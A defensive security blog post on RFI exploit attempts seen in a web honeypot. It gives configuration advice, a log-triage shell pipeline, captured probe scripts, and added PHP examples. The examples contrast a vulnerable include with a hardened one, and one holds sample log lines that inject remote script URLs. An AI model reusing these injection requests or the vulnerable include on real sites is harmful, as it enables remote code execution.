Today, we will take a quick look at remote file inclusion (RFI). Based on our web honeypot project, RFI is by far the most common exploit attempt. Most of the vulnerabilities exploited are rather old, but attackers apparently still find it worthwhile to try.
There are a number of simple configuration choices which will prevent exploitation of most of these problems, even if the old software is still installed. For example:
- turn off register_globals
- turn off allow_url_include
These settings are turned off by default in recent PHP versions. While they do not prevent all RFI exploits, they do prevent the exploits attempted by these simple scripts.
Basic vulnerable code looks like:
The reason for code like this is to provide a mechanism to include a customizable template or configuration file. For example, a user may switch a site's look to use a "green" template by calling the page with
If the file name is not sufficiently validated, the following exploit is possible:
Now "remoteshell.php" will be executed.
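The include pattern the text describes, as an added example rather than code from the diary: the vulnerable form hands the request parameter straight to include(), and the hardened form maps it onto a fixed list of template names and checks the resolved path. The templates/ directory, the template names and all function names are assumptions made for the illustration; the last function only reports whether the two php.ini settings listed above are enabled.

```php
<?php
// Added example (not the diary's own code). Directory layout, template names
// and function names are assumptions for illustration.

// VULNERABLE: the request parameter is used directly as the include path.
// With allow_url_include=On, a parameter of the form http://.../remoteshell.php
// makes PHP fetch and execute remote code; with it off, arbitrary local files
// can still be included.
function load_template_vulnerable(): void
{
    $template = $_GET['template'] ?? 'default.php';   // e.g. ?template=green.php
    include($template);
}

// HARDENED: the parameter is only ever a key into an allow-list of known
// template names; the file system path is never built from raw user input.
const TEMPLATES = ['default', 'green', 'blue'];

function resolve_template(string $requested, string $base_dir): ?string
{
    if (!in_array($requested, TEMPLATES, true)) {
        return null;                                   // unknown name: refuse
    }
    $base = realpath($base_dir);
    $path = realpath($base_dir . '/' . $requested . '.php');
    // Defence in depth: the resolved file must still live inside $base_dir.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function load_template_hardened(): void
{
    $requested = $_GET['template'] ?? 'default';
    $path = resolve_template($requested, __DIR__ . '/templates');
    if ($path === null) {
        $path = __DIR__ . '/templates/default.php';    // safe fallback
    }
    include $path;
}

// Reports the two settings the diary recommends turning off if they are on.
// Both default to off in recent PHP; register_globals was removed in PHP 5.4,
// so ini_get() returns false for it there.
function insecure_include_settings(): array
{
    $warnings = [];
    foreach (['allow_url_include', 'register_globals'] as $name) {
        if (filter_var(ini_get($name), FILTER_VALIDATE_BOOLEAN)) {
            $warnings[] = "$name is enabled";
        }
    }
    return $warnings;
}
```

The allow-list is what actually closes the hole; the realpath() check is a second line of defence in case the list is later replaced by something looser, and insecure_include_settings() is the kind of check to run from a deployment script so the php.ini defaults are not silently overridden.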
For this blog, I cut the URLs from my access log and grepped them for "=http", which doesn't get all attempts, but enough to tell this story. A common false positive I see with this method is the Google Analytics parameter passed in the URL, for example from Twitter links:
(shortened to fit the line)
After accounting for this issue, I was left with 3053 attempts (one day!), and 1548 unique requests.
Next I cut all unique RFI URLs out of the log. The shell command at this point:
cut -f2 -d'"' rfi | grep '=http' | grep -v 'utmr=http' | sed 's/.*=http/http/' | cut -f1 -d' '
(the file "rfi" is the result of an earlier grep)
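The same triage done in PHP, as an added example that is not from the diary: it applies the pipeline's filters to access-log lines (keep "=http" requests, drop the "utmr=http" false positive, cut the injected URL out of the request line) and returns the attempt, unique-request and distinct-URL counts plus a top-10 list. The log lines are constructed for the example and use documentation IP ranges, not real honeypot data.

```php
<?php
// Added example (not the diary's own code). The log lines are constructed.
const SAMPLE_LOG = <<<'LOG'
203.0.113.5 - - [01/Jan/2010:00:00:01 +0000] "GET /index.php?page=http://198.51.100.9/fx29.txt HTTP/1.1" 200 512 "-" "libwww-perl/5.8"
203.0.113.5 - - [01/Jan/2010:00:00:02 +0000] "GET /admin/index.php?inc=http://198.51.100.9/fx29.txt HTTP/1.1" 404 210 "-" "libwww-perl/5.8"
203.0.113.7 - - [01/Jan/2010:00:00:03 +0000] "GET /index.php?page=http://198.51.100.9/fx29.txt HTTP/1.1" 200 512 "-" "libwww-perl/5.8"
198.51.100.42 - - [01/Jan/2010:00:00:04 +0000] "GET /__utm.gif?utmr=http://twitter.com/somebody HTTP/1.1" 200 35 "http://example.invalid/" "Mozilla/5.0"
203.0.113.9 - - [01/Jan/2010:00:00:05 +0000] "GET /skin/page.php?template=http://203.0.113.200/zfx.txt HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.9 - - [01/Jan/2010:00:00:06 +0000] "GET /index.php HTTP/1.1" 200 4096 "-" "Mozilla/4.0"
LOG;

function triage_rfi(string $log): array
{
    $attempts = [];
    foreach (explode("\n", $log) as $line) {
        // Field 2 when splitting on '"' is the request line (cut -f2 -d'"').
        $parts = explode('"', $line);
        if (count($parts) < 2) {
            continue;
        }
        $request = $parts[1];
        // grep '=http' | grep -v 'utmr=http'
        if (strpos($request, '=http') === false || strpos($request, 'utmr=http') !== false) {
            continue;
        }
        // sed 's/.*=http/http/' is greedy, so take the text after the LAST
        // "=http"; cut -f1 -d' ' then drops the trailing " HTTP/1.1".
        $url = 'http' . substr($request, strrpos($request, '=http') + strlen('=http'));
        $url = explode(' ', $url, 2)[0];
        $attempts[] = ['request' => $request, 'url' => $url];
    }

    $requests = array_count_values(array_column($attempts, 'request'));
    $urls     = array_count_values(array_column($attempts, 'url'));
    arsort($urls);                                   // most-injected URL first

    return [
        'attempts'        => count($attempts),       // 4 for the sample
        'unique_requests' => count($requests),       // 3 (line 1 and 3 repeat)
        'distinct_urls'   => count($urls),           // 2
        'top_urls'        => array_slice($urls, 0, 10, true),
    ];
}

print_r(triage_rfi(SAMPLE_LOG));
```

The filtering is kept identical to the shell pipeline on purpose so the numbers agree; the one thing the function adds is that the three counts the text quotes, and the top-N list, come out of a single pass over the log.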
I found a total of 109 distinct URLs people attempted to inject. The top 10 URLs are:
I was able to download 71 of the scripts. About half of them resulted in identical scripts:
<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>
This is apparently just a quick test to see if the site is vulnerable. If successful, the script will insert "FeeLCoMzFeeLCoMz" in the site (and I will have to check how inserting this string here affects these attacks?).
Another essentially identical script accounted for a further 13:
<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>
At this point, I am left with about 20 scripts. Most of them added some system parameters like the output of 'id' or 'df'. The largest one came in at about 200 kBytes! It implemented a typical IRC bot, but it appears that the IRC server is no longer functional.
Looking over these bots, there is very little original code. One reason for the prolific exploitation of these vulnerabilities may be the availability of plenty of sample exploit code which is easily reused by the bottom tier of "script kiddies" who try to enter the "game" and are looking for an easy-to-execute exploit which requires little effort. Many of the exploit strings attempted appear to be implemented incorrectly for the vulnerability they target.